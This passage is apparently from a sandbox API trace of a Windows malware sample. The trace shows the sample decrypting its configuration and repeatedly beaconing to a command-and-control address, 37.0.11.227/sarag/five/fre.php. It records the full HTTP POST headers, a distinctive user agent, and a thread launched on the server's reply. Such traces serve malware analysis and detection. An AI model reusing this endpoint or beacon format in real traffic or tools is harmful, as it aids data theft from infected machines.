phProv=0x19fca8*=0x0) returned 1 [0331.104] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0331.105] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aed48) returned 1 [0331.115] GetProcessHeap () returned 0x690000 [0331.115] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88e0 [0331.116] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0331.116] CryptImportKey (in: hProv=0x6aed48, pbData=0x6a88e0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d628) returned 1 [0331.117] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0331.118] CryptSetKeyParam (hKey=0x69d628, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0331.222] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0331.223] CryptSetKeyParam (hKey=0x69d628, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0331.223] GetProcessHeap () returned 0x690000 [0331.223] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88e0 | out: hHeap=0x690000) returned 1 [0331.224] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0331.225] CryptDecrypt (in: hKey=0x69d628, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4418, pdwDataLen=0x19fcfc | out: pbData=0x6a4418, pdwDataLen=0x19fcfc) returned 1 [0331.225] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0331.226] CryptDestroyKey (hKey=0x69d628) returned 1 [0331.226] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0331.227] CryptReleaseContext (hProv=0x6aed48, dwFlags=0x0) returned 1 [0331.227] GetProcessHeap () returned 0x690000 [0331.227] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0331.228] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0331.228] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0331.229] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0331.229] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0331.230] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0331.230] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0331.231] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0331.231] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0331.231] GetProcessHeap () returned 0x690000 [0331.231] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0331.231] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0331.232] GetProcessHeap () returned 0x690000 [0331.232] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0331.235] GetProcessHeap () returned 0x690000 [0331.236] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0331.236] GetProcessHeap () returned 0x690000 [0331.237] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0331.237] GetProcessHeap () returned 0x690000 [0331.237] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0331.237] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0331.238] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0331.243] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0331.243] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af078) returned 1 [0331.253] GetProcessHeap () returned 0x690000 [0331.253] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8970 [0331.254] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0331.254] CryptImportKey (in: hProv=0x6af078, pbData=0x6a8970, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0331.257] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0331.258] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0331.259] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0331.259] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0331.259] GetProcessHeap () returned 0x690000 [0331.260] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8970 | out: hHeap=0x690000) returned 1 [0331.260] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0331.261] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0331.261] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0331.262] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0331.262] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0331.263] CryptReleaseContext (hProv=0x6af078, dwFlags=0x0) returned 1 [0331.263] GetProcessHeap () returned 0x690000 [0331.263] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0331.264] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0331.264] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0331.265] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0331.265] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0331.266] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0331.266] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0331.267] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0331.267] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0331.267] GetProcessHeap () returned 0x690000 [0331.268] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0331.268] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a31f0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0331.268] GetProcessHeap () returned 0x690000 [0331.268] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab4c0 [0331.268] socket (af=2, type=1, protocol=6) returned 0xba4 [0331.268] connect (s=0xba4, name=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0331.293] FreeAddrInfoW (pAddrInfo=0x6a31f0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0331.293] GetProcessHeap () returned 0x690000 [0331.293] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6af078 [0331.293] GetProcessHeap () returned 0x690000 [0331.293] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6cd7d8 [0331.294] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0331.294] wvsprintfA (in: param_1=0x6cd7d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0331.294] GetProcessHeap () returned 0x690000 [0331.294] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af8c0 [0331.295] GetProcessHeap () returned 0x690000 [0331.295] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0331.295] GetProcessHeap () returned 0x690000 [0331.295] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4418 [0331.295] GetProcessHeap () returned 0x690000 [0331.295] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6cd7d8 [0331.296] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0331.297] wvsprintfA (in: param_1=0x6cd7d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0331.297] GetProcessHeap () returned 0x690000 [0331.297] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0331.297] GetProcessHeap () returned 0x690000 [0331.297] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0331.297] send (s=0xba4, buf=0x6ad508*, len=242, flags=0) returned 242 [0331.298] send (s=0xba4, buf=0x6aba40*, len=159, flags=0) returned 159 [0331.298] GetProcessHeap () returned 0x690000 [0331.298] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0331.298] recv (in: s=0xba4, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0331.368] GetProcessHeap () returned 0x690000 [0331.369] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0331.369] GetProcessHeap () returned 0x690000 [0331.369] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0331.369] GetProcessHeap () returned 0x690000 [0331.370] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af8c0 | out: hHeap=0x690000) returned 1 [0331.370] GetProcessHeap () returned 0x690000 [0331.370] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af078 | out: hHeap=0x690000) returned 1 [0331.370] closesocket (s=0xba4) returned 0 [0331.371] GetProcessHeap () returned 0x690000 [0331.371] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab4c0 | out: hHeap=0x690000) returned 1 [0331.371] GetProcessHeap () returned 0x690000 [0331.371] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0331.371] GetProcessHeap () returned 0x690000 [0331.372] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0331.372] GetProcessHeap () returned 0x690000 [0331.372] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0331.373] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x18f0) returned 0xba4 [0331.375] Sleep (dwMilliseconds=0xea60) [0331.378] GetProcessHeap () returned 0x690000 [0331.378] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a3fe0 [0331.379] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0331.379] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0331.384] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0331.385] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aef68) returned 1 [0331.391] GetProcessHeap () returned 0x690000 [0331.391] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0331.391] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0331.396] CryptImportKey (in: hProv=0x6aef68, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0331.398] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0331.400] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0331.401] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0331.401] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0331.401] GetProcessHeap () returned 0x690000 [0331.402] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0331.402] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0331.403] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a3fe0, pdwDataLen=0x19fcfc | out: pbData=0x6a3fe0, pdwDataLen=0x19fcfc) returned 1 [0331.406] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0331.406] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0331.407] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0331.407] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0331.407] GetProcessHeap () returned 0x690000 [0331.407] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0331.408] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0331.411] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0331.412] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0331.417] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0331.418] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0331.418] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0331.421] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0331.422] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0331.422] GetProcessHeap () returned 0x690000 [0331.422] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f48 [0331.422] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0331.422] GetProcessHeap () returned 0x690000 [0331.423] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f48 | out: hHeap=0x690000) returned 1 [0331.423] GetProcessHeap () returned 0x690000 [0331.423] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0331.423] GetProcessHeap () returned 0x690000 [0331.424] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0331.424] GetProcessHeap () returned 0x690000 [0331.424] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0331.424] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0331.425] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0331.430] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0331.431] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af078) returned 1 [0331.436] GetProcessHeap () returned 0x690000 [0331.436] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0331.437] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0331.437] CryptImportKey (in: hProv=0x6af078, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0331.438] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0331.438] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0331.439] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0331.439] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0331.439] GetProcessHeap () returned 0x690000 [0331.440] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0331.441] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0331.441] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0331.442] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0331.444] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0331.444] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0331.445] CryptReleaseContext (hProv=0x6af078, dwFlags=0x0) returned 1 [0331.445] GetProcessHeap () returned 0x690000 [0331.445] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0331.445] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0331.446] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0331.446] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0331.446] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0331.447] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0331.447] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0331.448] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0331.449] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0331.449] GetProcessHeap () returned 0x690000 [0331.449] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0331.449] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0331.449] GetProcessHeap () returned 0x690000 [0331.449] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab4a0 [0331.449] socket (af=2, type=1, protocol=6) returned 0xba8 [0331.449] connect (s=0xba8, name=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0331.473] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0331.473] GetProcessHeap () returned 0x690000 [0331.473] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6af100 [0331.473] GetProcessHeap () returned 0x690000 [0331.473] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6cd7d8 [0331.473] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0331.474] wvsprintfA (in: param_1=0x6cd7d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0331.474] GetProcessHeap () returned 0x690000 [0331.474] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af5c0 [0331.474] GetProcessHeap () returned 0x690000 [0331.474] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0331.475] GetProcessHeap () returned 0x690000 [0331.475] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a3fe0 [0331.475] GetProcessHeap () returned 0x690000 [0331.475] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6cd7d8 [0331.475] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0331.476] wvsprintfA (in: param_1=0x6cd7d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0331.476] GetProcessHeap () returned 0x690000 [0331.476] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0331.476] GetProcessHeap () returned 0x690000 [0331.476] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0331.476] send (s=0xba8, buf=0x6ad508*, len=242, flags=0) returned 242 [0331.477] send (s=0xba8, buf=0x6aba40*, len=159, flags=0) returned 159 [0331.477] GetProcessHeap () returned 0x690000 [0331.477] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0331.477] recv (in: s=0xba8, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0331.583] GetProcessHeap () returned 0x690000 [0331.583] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0331.583] GetProcessHeap () returned 0x690000 [0331.584] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0331.584] GetProcessHeap () returned 0x690000 [0331.584] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af5c0 | out: hHeap=0x690000) returned 1 [0331.584] GetProcessHeap () returned 0x690000 [0331.584] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af100 | out: hHeap=0x690000) returned 1 [0331.584] closesocket (s=0xba8) returned 0 [0331.587] GetProcessHeap () returned 0x690000 [0331.587] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab4a0 | out: hHeap=0x690000) returned 1 [0331.587] GetProcessHeap () returned 0x690000 [0331.588] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0331.588] GetProcessHeap () returned 0x690000 [0331.588] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0331.589] GetProcessHeap () returned 0x690000 [0331.589] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0331.589] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x18f4) returned 0xba8 [0331.594] Sleep (dwMilliseconds=0xea60) [0331.596] GetProcessHeap () returned 0x690000 [0331.596] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0331.597] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0331.598] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0331.606] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0331.607] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af100) returned 1 [0331.616] GetProcessHeap () returned 0x690000 [0331.616] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a30 [0331.617] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0331.617] CryptImportKey (in: hProv=0x6af100, pbData=0x6a8a30, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0331.618] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0331.626] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0331.627] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0331.627] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0331.627] GetProcessHeap () returned 0x690000 [0331.628] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a30 | out: hHeap=0x690000) returned 1 [0331.633] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0331.634] 